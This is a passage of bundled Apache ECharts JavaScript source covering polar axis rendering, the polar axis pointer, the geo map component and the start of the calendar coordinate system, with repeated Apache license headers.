lineStyleModel.get('color');\n        var lineCount = 0;\n\n        lineColors = lineColors instanceof Array ? lineColors : [lineColors];\n\n        var splitLines = [];\n\n        for (var i = 0; i < ticksAngles.length; i++) {\n            var colorIndex = (lineCount++) % lineColors.length;\n            splitLines[colorIndex] = splitLines[colorIndex] || [];\n            splitLines[colorIndex].push(new Line({\n                shape: getAxisLineShape(polar, radiusExtent, ticksAngles[i].coord)\n            }));\n        }\n\n        // Simple optimization\n        // Batching the lines if color are the same\n        for (var i = 0; i < splitLines.length; i++) {\n            this.group.add(mergePath(splitLines[i], {\n                style: defaults({\n                    stroke: lineColors[i % lineColors.length]\n                }, lineStyleModel.getLineStyle()),\n                silent: true,\n                z: angleAxisModel.get('z')\n            }));\n        }\n    },\n\n    /**\n     * @private\n     */\n    _minorSplitLine: function (angleAxisModel, polar, ticksAngles, minorTickAngles, radiusExtent) {\n        if (!minorTickAngles.length) {\n            return;\n        }\n\n        var minorSplitLineModel = angleAxisModel.getModel('minorSplitLine');\n        var lineStyleModel = minorSplitLineModel.getModel('lineStyle');\n\n        var lines = [];\n\n        for (var i = 0; i < minorTickAngles.length; i++) {\n            for (var k = 0; k < minorTickAngles[i].length; k++) {\n                lines.push(new Line({\n                    shape: getAxisLineShape(polar, radiusExtent, minorTickAngles[i][k].coord)\n                }));\n            }\n        }\n\n        this.group.add(mergePath(lines, {\n            style: lineStyleModel.getLineStyle(),\n            silent: true,\n            z: angleAxisModel.get('z')\n        }));\n    },\n\n    /**\n     * @private\n     */\n    _splitArea: function (angleAxisModel, polar, ticksAngles, minorTickAngles, radiusExtent) {\n        if (!ticksAngles.length) {\n            return;\n        }\n\n        var splitAreaModel = angleAxisModel.getModel('splitArea');\n        var areaStyleModel = splitAreaModel.getModel('areaStyle');\n        var areaColors = areaStyleModel.get('color');\n        var lineCount = 0;\n\n        areaColors = areaColors instanceof Array ? areaColors : [areaColors];\n\n        var splitAreas = [];\n\n        var RADIAN = Math.PI / 180;\n        var prevAngle = -ticksAngles[0].coord * RADIAN;\n        var r0 = Math.min(radiusExtent[0], radiusExtent[1]);\n        var r1 = Math.max(radiusExtent[0], radiusExtent[1]);\n\n        var clockwise = angleAxisModel.get('clockwise');\n\n        for (var i = 1; i < ticksAngles.length; i++) {\n            var colorIndex = (lineCount++) % areaColors.length;\n            splitAreas[colorIndex] = splitAreas[colorIndex] || [];\n            splitAreas[colorIndex].push(new Sector({\n                shape: {\n                    cx: polar.cx,\n                    cy: polar.cy,\n                    r0: r0,\n                    r: r1,\n                    startAngle: prevAngle,\n                    endAngle: -ticksAngles[i].coord * RADIAN,\n                    clockwise: clockwise\n                },\n                silent: true\n            }));\n            prevAngle = -ticksAngles[i].coord * RADIAN;\n        }\n\n        // Simple optimization\n        // Batching the lines if color are the same\n        for (var i = 0; i < splitAreas.length; i++) {\n            this.group.add(mergePath(splitAreas[i], {\n                style: defaults({\n                    fill: areaColors[i % areaColors.length]\n                }, areaStyleModel.getAreaStyle()),\n                silent: true\n            }));\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar axisBuilderAttrs$3 = [\n    'axisLine', 'axisTickLabel', 'axisName'\n];\nvar selfBuilderAttrs$2 = [\n    'splitLine', 'splitArea', 'minorSplitLine'\n];\n\nAxisView.extend({\n\n    type: 'radiusAxis',\n\n    axisPointerClass: 'PolarAxisPointer',\n\n    render: function (radiusAxisModel, ecModel) {\n        this.group.removeAll();\n        if (!radiusAxisModel.get('show')) {\n            return;\n        }\n        var radiusAxis = radiusAxisModel.axis;\n        var polar = radiusAxis.polar;\n        var angleAxis = polar.getAngleAxis();\n        var ticksCoords = radiusAxis.getTicksCoords();\n        var minorTicksCoords = radiusAxis.getMinorTicksCoords();\n        var axisAngle = angleAxis.getExtent()[0];\n        var radiusExtent = radiusAxis.getExtent();\n\n        var layout = layoutAxis(polar, radiusAxisModel, axisAngle);\n        var axisBuilder = new AxisBuilder(radiusAxisModel, layout);\n        each$1(axisBuilderAttrs$3, axisBuilder.add, axisBuilder);\n        this.group.add(axisBuilder.getGroup());\n\n        each$1(selfBuilderAttrs$2, function (name) {\n            if (radiusAxisModel.get(name + '.show') && !radiusAxis.scale.isBlank()) {\n                this['_' + name](radiusAxisModel, polar, axisAngle, radiusExtent, ticksCoords, minorTicksCoords);\n            }\n        }, this);\n    },\n\n    /**\n     * @private\n     */\n    _splitLine: function (radiusAxisModel, polar, axisAngle, radiusExtent, ticksCoords) {\n        var splitLineModel = radiusAxisModel.getModel('splitLine');\n        var lineStyleModel = splitLineModel.getModel('lineStyle');\n        var lineColors = lineStyleModel.get('color');\n        var lineCount = 0;\n\n        lineColors = lineColors instanceof Array ? lineColors : [lineColors];\n\n        var splitLines = [];\n\n        for (var i = 0; i < ticksCoords.length; i++) {\n            var colorIndex = (lineCount++) % lineColors.length;\n            splitLines[colorIndex] = splitLines[colorIndex] || [];\n            splitLines[colorIndex].push(new Circle({\n                shape: {\n                    cx: polar.cx,\n                    cy: polar.cy,\n                    r: ticksCoords[i].coord\n                }\n            }));\n        }\n\n        // Simple optimization\n        // Batching the lines if color are the same\n        for (var i = 0; i < splitLines.length; i++) {\n            this.group.add(mergePath(splitLines[i], {\n                style: defaults({\n                    stroke: lineColors[i % lineColors.length],\n                    fill: null\n                }, lineStyleModel.getLineStyle()),\n                silent: true\n            }));\n        }\n    },\n\n    /**\n     * @private\n     */\n    _minorSplitLine: function (radiusAxisModel, polar, axisAngle, radiusExtent, ticksCoords, minorTicksCoords) {\n        if (!minorTicksCoords.length) {\n            return;\n        }\n\n        var minorSplitLineModel = radiusAxisModel.getModel('minorSplitLine');\n        var lineStyleModel = minorSplitLineModel.getModel('lineStyle');\n\n        var lines = [];\n\n        for (var i = 0; i < minorTicksCoords.length; i++) {\n            for (var k = 0; k < minorTicksCoords[i].length; k++) {\n                lines.push(new Circle({\n                    shape: {\n                        cx: polar.cx,\n                        cy: polar.cy,\n                        r: minorTicksCoords[i][k].coord\n                    }\n                }));\n            }\n        }\n\n        this.group.add(mergePath(lines, {\n            style: defaults({\n                fill: null\n            }, lineStyleModel.getLineStyle()),\n            silent: true\n        }));\n    },\n\n    /**\n     * @private\n     */\n    _splitArea: function (radiusAxisModel, polar, axisAngle, radiusExtent, ticksCoords) {\n        if (!ticksCoords.length) {\n            return;\n        }\n\n        var splitAreaModel = radiusAxisModel.getModel('splitArea');\n        var areaStyleModel = splitAreaModel.getModel('areaStyle');\n        var areaColors = areaStyleModel.get('color');\n        var lineCount = 0;\n\n        areaColors = areaColors instanceof Array ? areaColors : [areaColors];\n\n        var splitAreas = [];\n\n        var prevRadius = ticksCoords[0].coord;\n        for (var i = 1; i < ticksCoords.length; i++) {\n            var colorIndex = (lineCount++) % areaColors.length;\n            splitAreas[colorIndex] = splitAreas[colorIndex] || [];\n            splitAreas[colorIndex].push(new Sector({\n                shape: {\n                    cx: polar.cx,\n                    cy: polar.cy,\n                    r0: prevRadius,\n                    r: ticksCoords[i].coord,\n                    startAngle: 0,\n                    endAngle: Math.PI * 2\n                },\n                silent: true\n            }));\n            prevRadius = ticksCoords[i].coord;\n        }\n\n        // Simple optimization\n        // Batching the lines if color are the same\n        for (var i = 0; i < splitAreas.length; i++) {\n            this.group.add(mergePath(splitAreas[i], {\n                style: defaults({\n                    fill: areaColors[i % areaColors.length]\n                }, areaStyleModel.getAreaStyle()),\n                silent: true\n            }));\n        }\n    }\n});\n\n/**\n * @inner\n */\nfunction layoutAxis(polar, radiusAxisModel, axisAngle) {\n    return {\n        position: [polar.cx, polar.cy],\n        rotation: axisAngle / 180 * Math.PI,\n        labelDirection: -1,\n        tickDirection: -1,\n        nameDirection: 1,\n        labelRotate: radiusAxisModel.getModel('axisLabel').get('rotate'),\n        // Over splitLine and splitArea\n        z2: 1\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar PolarAxisPointer = BaseAxisPointer.extend({\n\n    /**\n     * @override\n     */\n    makeElOption: function (elOption, value, axisModel, axisPointerModel, api) {\n        var axis = axisModel.axis;\n\n        if (axis.dim === 'angle') {\n            this.animationThreshold = Math.PI / 18;\n        }\n\n        var polar = axis.polar;\n        var otherAxis = polar.getOtherAxis(axis);\n        var otherExtent = otherAxis.getExtent();\n\n        var coordValue;\n        coordValue = axis['dataTo' + capitalFirst(axis.dim)](value);\n\n        var axisPointerType = axisPointerModel.get('type');\n        if (axisPointerType && axisPointerType !== 'none') {\n            var elStyle = buildElStyle(axisPointerModel);\n            var pointerOption = pointerShapeBuilder$2[axisPointerType](\n                axis, polar, coordValue, otherExtent, elStyle\n            );\n            pointerOption.style = elStyle;\n            elOption.graphicKey = pointerOption.type;\n            elOption.pointer = pointerOption;\n        }\n\n        var labelMargin = axisPointerModel.get('label.margin');\n        var labelPos = getLabelPosition(value, axisModel, axisPointerModel, polar, labelMargin);\n        buildLabelElOption(elOption, axisModel, axisPointerModel, api, labelPos);\n    }\n\n    // Do not support handle, utill any user requires it.\n\n});\n\nfunction getLabelPosition(value, axisModel, axisPointerModel, polar, labelMargin) {\n    var axis = axisModel.axis;\n    var coord = axis.dataToCoord(value);\n    var axisAngle = polar.getAngleAxis().getExtent()[0];\n    axisAngle = axisAngle / 180 * Math.PI;\n    var radiusExtent = polar.getRadiusAxis().getExtent();\n    var position;\n    var align;\n    var verticalAlign;\n\n    if (axis.dim === 'radius') {\n        var transform = create$1();\n        rotate(transform, transform, axisAngle);\n        translate(transform, transform, [polar.cx, polar.cy]);\n        position = applyTransform$1([coord, -labelMargin], transform);\n\n        var labelRotation = axisModel.getModel('axisLabel').get('rotate') || 0;\n        var labelLayout = AxisBuilder.innerTextLayout(\n            axisAngle, labelRotation * Math.PI / 180, -1\n        );\n        align = labelLayout.textAlign;\n        verticalAlign = labelLayout.textVerticalAlign;\n    }\n    else { // angle axis\n        var r = radiusExtent[1];\n        position = polar.coordToPoint([r + labelMargin, coord]);\n        var cx = polar.cx;\n        var cy = polar.cy;\n        align = Math.abs(position[0] - cx) / r < 0.3\n            ? 'center' : (position[0] > cx ? 'left' : 'right');\n        verticalAlign = Math.abs(position[1] - cy) / r < 0.3\n            ? 'middle' : (position[1] > cy ? 'top' : 'bottom');\n    }\n\n    return {\n        position: position,\n        align: align,\n        verticalAlign: verticalAlign\n    };\n}\n\n\nvar pointerShapeBuilder$2 = {\n\n    line: function (axis, polar, coordValue, otherExtent, elStyle) {\n        return axis.dim === 'angle'\n            ? {\n                type: 'Line',\n                shape: makeLineShape(\n                    polar.coordToPoint([otherExtent[0], coordValue]),\n                    polar.coordToPoint([otherExtent[1], coordValue])\n                )\n            }\n            : {\n                type: 'Circle',\n                shape: {\n                    cx: polar.cx,\n                    cy: polar.cy,\n                    r: coordValue\n                }\n            };\n    },\n\n    shadow: function (axis, polar, coordValue, otherExtent, elStyle) {\n        var bandWidth = Math.max(1, axis.getBandWidth());\n        var radian = Math.PI / 180;\n\n        return axis.dim === 'angle'\n            ? {\n                type: 'Sector',\n                shape: makeSectorShape(\n                    polar.cx, polar.cy,\n                    otherExtent[0], otherExtent[1],\n                    // In ECharts y is negative if angle is positive\n                    (-coordValue - bandWidth / 2) * radian,\n                    (-coordValue + bandWidth / 2) * radian\n                )\n            }\n            : {\n                type: 'Sector',\n                shape: makeSectorShape(\n                    polar.cx, polar.cy,\n                    coordValue - bandWidth / 2,\n                    coordValue + bandWidth / 2,\n                    0, Math.PI * 2\n                )\n            };\n    }\n};\n\nAxisView.registerAxisPointerClass('PolarAxisPointer', PolarAxisPointer);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// For reducing size of echarts.min, barLayoutPolar is required by polar.\nregisterLayout(curry(barLayoutPolar, 'bar'));\n\n// Polar view\nextendComponentView({\n    type: 'polar'\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar GeoModel = ComponentModel.extend({\n\n    type: 'geo',\n\n    /**\n     * @type {module:echarts/coord/geo/Geo}\n     */\n    coordinateSystem: null,\n\n    layoutMode: 'box',\n\n    init: function (option) {\n        ComponentModel.prototype.init.apply(this, arguments);\n\n        // Default label emphasis `show`\n        defaultEmphasis(option, 'label', ['show']);\n    },\n\n    optionUpdated: function () {\n        var option = this.option;\n        var self = this;\n\n        option.regions = geoCreator.getFilledRegions(option.regions, option.map, option.nameMap);\n\n        this._optionModelMap = reduce(option.regions || [], function (optionModelMap, regionOpt) {\n            if (regionOpt.name) {\n                optionModelMap.set(regionOpt.name, new Model(regionOpt, self));\n            }\n            return optionModelMap;\n        }, createHashMap());\n\n        this.updateSelectedMap(option.regions);\n    },\n\n    defaultOption: {\n\n        zlevel: 0,\n\n        z: 0,\n\n        show: true,\n\n        left: 'center',\n\n        top: 'center',\n\n\n        // width:,\n        // height:,\n        // right\n        // bottom\n\n        // Aspect is width / height. Inited to be geoJson bbox aspect\n        // This parameter is used for scale this aspect\n        // If svg used, aspectScale is 1 by default.\n        // aspectScale: 0.75,\n        aspectScale: null,\n\n        ///// Layout with center and size\n        // If you wan't to put map in a fixed size box with right aspect ratio\n        // This two properties may more conveninet\n        // layoutCenter: [50%, 50%]\n        // layoutSize: 100\n\n        silent: false,\n\n        // Map type\n        map: '',\n\n        // Define left-top, right-bottom coords to control view\n        // For example, [ [180, 90], [-180, -90] ]\n        boundingCoords: null,\n\n        // Default on center of map\n        center: null,\n\n        zoom: 1,\n\n        scaleLimit: null,\n\n        // selectedMode: false\n\n        label: {\n            show: false,\n            color: '#000'\n        },\n\n        itemStyle: {\n            // color: 各异,\n            borderWidth: 0.5,\n            borderColor: '#444',\n            color: '#eee'\n        },\n\n        emphasis: {\n            label: {\n                show: true,\n                color: 'rgb(100,0,0)'\n            },\n            itemStyle: {\n                color: 'rgba(255,215,0,0.8)'\n            }\n        },\n\n        regions: []\n    },\n\n    /**\n     * Get model of region\n     * @param  {string} name\n     * @return {module:echarts/model/Model}\n     */\n    getRegionModel: function (name) {\n        return this._optionModelMap.get(name) || new Model(null, this, this.ecModel);\n    },\n\n    /**\n     * Format label\n     * @param {string} name Region name\n     * @param {string} [status='normal'] 'normal' or 'emphasis'\n     * @return {string}\n     */\n    getFormattedLabel: function (name, status) {\n        var regionModel = this.getRegionModel(name);\n        var formatter = regionModel.get(\n            'label'\n            + (status === 'normal' ? '.' : status + '.')\n            + 'formatter'\n        );\n        var params = {\n            name: name\n        };\n        if (typeof formatter === 'function') {\n            params.status = status;\n            return formatter(params);\n        }\n        else if (typeof formatter === 'string') {\n            return formatter.replace('{a}', name != null ? name : '');\n        }\n    },\n\n    setZoom: function (zoom) {\n        this.option.zoom = zoom;\n    },\n\n    setCenter: function (center) {\n        this.option.center = center;\n    }\n});\n\nmixin(GeoModel, selectableMixin);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nextendComponentView({\n\n    type: 'geo',\n\n    init: function (ecModel, api) {\n        var mapDraw = new MapDraw(api, true);\n        this._mapDraw = mapDraw;\n\n        this.group.add(mapDraw.group);\n    },\n\n    render: function (geoModel, ecModel, api, payload) {\n        // Not render if it is an toggleSelect action from self\n        if (payload && payload.type === 'geoToggleSelect'\n            && payload.from === this.uid\n        ) {\n            return;\n        }\n\n        var mapDraw = this._mapDraw;\n        if (geoModel.get('show')) {\n            mapDraw.draw(geoModel, ecModel, api, this, payload);\n        }\n        else {\n            this._mapDraw.group.removeAll();\n        }\n\n        this.group.silent = geoModel.get('silent');\n    },\n\n    dispose: function () {\n        this._mapDraw && this._mapDraw.remove();\n    }\n\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nfunction makeAction(method, actionInfo) {\n    actionInfo.update = 'updateView';\n    registerAction(actionInfo, function (payload, ecModel) {\n        var selected = {};\n\n        ecModel.eachComponent(\n            { mainType: 'geo', query: payload},\n            function (geoModel) {\n                geoModel[method](payload.name);\n                var geo = geoModel.coordinateSystem;\n                each$1(geo.regions, function (region) {\n                    selected[region.name] = geoModel.isSelected(region.name) || false;\n                });\n            }\n        );\n\n        return {\n            selected: selected,\n            name: payload.name\n        };\n    });\n}\n\nmakeAction('toggleSelected', {\n    type: 'geoToggleSelect',\n    event: 'geoselectchanged'\n});\nmakeAction('select', {\n    type: 'geoSelect',\n    event: 'geoselected'\n});\nmakeAction('unSelect', {\n    type: 'geoUnSelect',\n    event: 'geounselected'\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// (24*60*60*1000)\nvar PROXIMATE_ONE_DAY = 86400000;\n\n/**\n * Calendar\n *\n * @constructor\n *\n * @param {Object} calendarModel calendarModel\n * @param {Object} ecModel       ecModel\n * @param {Object} api           api\n */\nfunction Calendar(calendarModel, ecModel, api) {\n    this._model = calendarModel;\n}\n\nCalendar.prototype = {\n\n    constructor: Calendar,\n\n    type: 'calendar',\n\n    dimensions: ['time', 'value'],\n\n    // Required in createListFromData\n    getDimensionsInfo: function () {\n        return [{name: 'time', type: 'time'}, 'value'];\n    },\n\n    getRangeInfo: function () {\n        return this._rangeInfo;\n    },\n\n    getModel: function () {\n        return this._model;\n    },\n\n    getRect: function () {\n        return this._rect;\n    },\n\n    getCellWidth: function () {\n        return this._sw;\n    },\n\n    getCellHeight: function () {\n        return this._sh;\n    },\n\n    getOrient: function () {\n        return this._orient;\n    },\n\n    /**\n     * getFirstDayOfWeek\n     *\n     * @example\n     *     0 : start at Sunday\n     *     1 : start at Monday\n     *\n     * @return {number}\n     */\n    getFirstDayOfWeek: function () {\n        return this._firstDayOfWeek;\n    },\n\n    /**\n     * get date info\n     *\n     * @param  {string|number} date date\n     * @return {Object}\n     * {\n     *      y: string, local full year, eg., '1940',\n     *      m: string, local month, from '01' ot '12',\n     *      d: string, local date, from '01' to '31' (if exists),\n     *      day: It is not date.getDay(). It is the location of the cell in a week, from 0 to 6,\n     *      time: timestamp,\n     *      formatedDate: string, yyyy-MM-dd,\n     *      date: original date object.\n     * }\n     */\n    getDateInfo: function (date) {\n\n        date = parseDate(date);\n\n        var y = date.getFullYear();\n\n        var m = date.getMonth() + 1;\n        m = m < 10 ? '0' + m : m;\n\n        var d = date.getDate();\n        d = d < 10 ? '0' + d : d;\n\n        var day = date.getDay();\n\n        day = Math.abs((day + 7 - this.getFirstDayOfWeek()) % 7);\n\n        return {\n            y: y,\n            m: m,\n            d: d,\n            day: day,\n            time: date.getTime(),\n            formatedDate: y + '-' + m + '-' + d,\n            date: date\n        };\n    },\n\n    getNextNDay: function (date, n) {\n        n = n || 0;\n        if (n === 0) {\n            return this.getDateInfo(date);\n        }\n\n        date = new Date(this.getDateInfo(date).time);\n        date.setDate(date.getDate() + n);\n\n        return this.getDateInfo(date);\n    },\n\n    update: function (ecModel, api) {\n\n        this._firstDayOfWeek = +this._model.getModel('dayLabel').get('firstDay');\n        this._orient = this._model.get('orient');\n        this._lineWidth = this._model.getModel('itemStyle').getItemStyle().lineWidth || 0;\n\n\n        this._rangeInfo = this._getRangeInfo(this._initRangeOption());\n        var weeks = this._rangeInfo.weeks || 1;\n        var whNames = ['width', 'height'];\n        var cellSize = this._model.get('cellSize').slice();\n        var layoutParams = this._model.getBoxLayoutParams();\n        var cellNumbers = this._orient === 'horizontal' ? [weeks, 7] : [7, weeks];\n\n        each$1([0, 1], function (idx) {\n            if (cellSizeSpecified(cellSize, idx)) {\n                layoutParams[whNames[idx]] = cellSize[idx] * cellNumbers[idx];\n            }\n        });\n\n        var whGlobal = {\n            width: api.getWidth(),\n            height: api.getHeight()\n        };\n        var calendarRect = this._rect = getLayoutRect(layoutParams, whGlobal);\n\n        each$1([0, 1], function (idx) {\n            if (!cellSizeSpecified(cellSize, idx)) {\n                cellSize[idx] = calendarRect[whNames[idx]] / cellNumbers[idx];\n            }\n        });\n\n        function cellSizeSpecified(cellSize, idx) {\n            return cellSize[idx] != null && cellSize[idx] !== 'auto';\n        }\n\n        this._sw = cellSize[0];\n        this._sh = cellSize[1];\n    },\n\n\n    /**\n     * Convert a time data(time, value) item to (x, y) point.\n     *\n     * @override\n     * @param  {Array|number} data data\n     * @param  {boolean} [clamp=true] out of range\n     * @return {Array} point\n     */\n    dataToPoint: function (data, clamp) {\n        isArray(data) && (data = data[0]);\n        clamp == null && (clamp = true);\n\n        var dayInfo = this.getDateInfo(data);\n        var range = this._rangeInfo;\n        var date = dayInfo.formatedDate;\n\n        // if not in range return [NaN, NaN]\n        if (clamp && !(\n            dayInfo.time >= range.start.time\n            && dayInfo.time < range.end.time + PROXIMATE_ONE_DAY\n        )) {\n            return [NaN, NaN];\n        }\n\n        var week = dayInfo.day;\n        var nthWeek = this._getRangeInfo([range.start.time, date]).nthWeek;\n\n        if (this._orient === 'vertical') {\n            return [\n                this._rect.x + week * this._sw + this._sw / 2,\n                this._rect.y + nthWeek * this._sh + this._sh / 2\n            ];\n\n        }\n\n        return [\n            this._rect.x + nthWeek * this._sw + this._sw / 2,\n            this._rect.y + week * this._sh + this._sh / 2\n        ];\n\n    },\n\n    /**\n     * Convert a (x, y) point to time data\n     *\n     * @override\n     * @param  {string} point point\n     * @return {string}       data\n     */\n    pointToData: function (point) {\n\n        var date = this.pointToDate(point);\n\n        return date && date.time;\n    },\n\n    /**\n     * Convert a time date item to (x, y) four point.\n     *\n     * @param  {Array} data  date[0] is date\n     * @param  {boolean} [clamp=true]  out of range\n     * @return {Object}       point\n     */\n    dataToRect: function (data, clamp) {\n        var point = this.dataToPoint(data, clamp);\n\n        return {\n            contentShape: {\n                x: point[0] - (this._sw - this._lineWidth) / 2,\n                y: point[1] - (this._sh - this._lineWidth) / 2,\n                width: this._sw - this._lineWidth,\n                height: this._sh - this._lineWidth\n            },\n\n            center: point,\n\n            tl: [\n                point[0] - this._sw / 2,\n                point[1] - this._sh / 2\n            ],\n\n            tr: [\n                point[0] + this._sw / 2,\n                point[1] - this._sh / 2\n            ],\n\n            br: [\n                point[0] + this._sw / 2,\n                point[1] + this._sh / 2\n            ],\n\n            bl: [\n                point[0] - this._sw / 2,\n                point[1] + this._sh / 2\n            ]\n\n        };\n    },\n\n    /**\n     * Convert a (x, y) point to time date\n     *\n     * @param  {Array} point point\n     * @return {Object}       date\n     */\n    pointToDate: function (point) {\n        var nthX = Math.floor((point[0] - this._rect.x) / this._sw) + 1;\n        var nthY = Math.floor((point[1] - this._rect.y) / this._sh) + 1;\n        var range = this._rangeInfo.range;\n\n        if (this._orient === 'vertical') {\n            return this._getDateByWeeksAndDay(nthY, nthX - 1, range);\n        }\n\n        return this._getDateByWeeksAndDay(nthX, nthY - 1, range);\n    },\n\n    /**\n     * @inheritDoc\n     */\n    convertToPixel: curry(doConvert$2, 'dataToPoint'),\n\n    /**\n     * @inheritDoc\n     */\n    convertFromPixel: curry(doConvert$2, 'pointToData'),\n\n    /**\n     * initRange\n     *\n     * @private\n     * @return {Array} [start, end]\n     */\n    _initRangeOption: function () {\n        var range = this._model.get('range');\n\n        var rg = range;\n\n        if (isArray(rg) && rg.length === 1) {\n            rg = rg[0];\n        }\n\n        if (/^\\d{4}$/.test(rg)) {\n            range = [rg + '-01-01', rg + '-12-31'];\n        }\n\n        if (/^\\d{4}[\\/|-]\\d{1,2}$/.test(rg)) {\n\n            var start = this.getDateInfo(rg);\n            var firstDay = start.date;\n            firstDay.setMonth(firstDay.getMonth() + 1);\n\n            var end = this.getNextNDay(firstDay, -1);\n            range = [start.formatedDate, end.formatedDate];\n        }\n\n        if (/^\\d{4}[\\/|-]\\d{1,2}[\\/|-]\\d{1,2}$/.test(rg)) {\n            range = [rg, rg];\n        }\n\n        var tmp = this._getRangeInfo(range);\n\n        if (tmp.start.time > tmp.end.time) {\n            range.reverse();\n        }\n\n        return range;\n    },\n\n    /**\n     * range info\n     *\n     * @private\n     * @param  {Array} range range ['2017-01-01', '2017-07-08']\n     *  If range[0] > range[1], they will not be reversed.\n     * @return {Object}       obj\n     */\n    _getRangeInfo: function (range) {\n        range = [\n            this.getDateInfo(range[0]),\n            this.getDateInfo(range[1])\n        ];\n\n        var reversed;\n        if (range[0].time > range[1].time) {\n            reversed = true;\n            range.reverse();\n        }\n\n        var allDay = Math.floor(range[1].time / PROXIMATE_ONE_DAY)\n            - Math.floor(range[0].time / PROXIMATE_ONE_DAY) + 1;\n\n        // Consider case:\n        // Firstly set system timezone as \"Time Zone: America/Toronto\",\n        // ```\n        // var first = new Date(1478412000000 - 3600 * 1000 * 2.5);\n        // var second = new Date(1478412000000);\n        // var allDays = Math.floor(second / ONE_DAY) - Math.floor(first / ONE_DAY) + 1;\n        // ```\n        // will get wrong result because of DST. So we should fix it.\n        var date = new Date(range[0].time);\n        var startDateNum = date.getDate();\n        var endDateNum = range[1].date.getDate();\n        date.setDate(startDateNum + allDay - 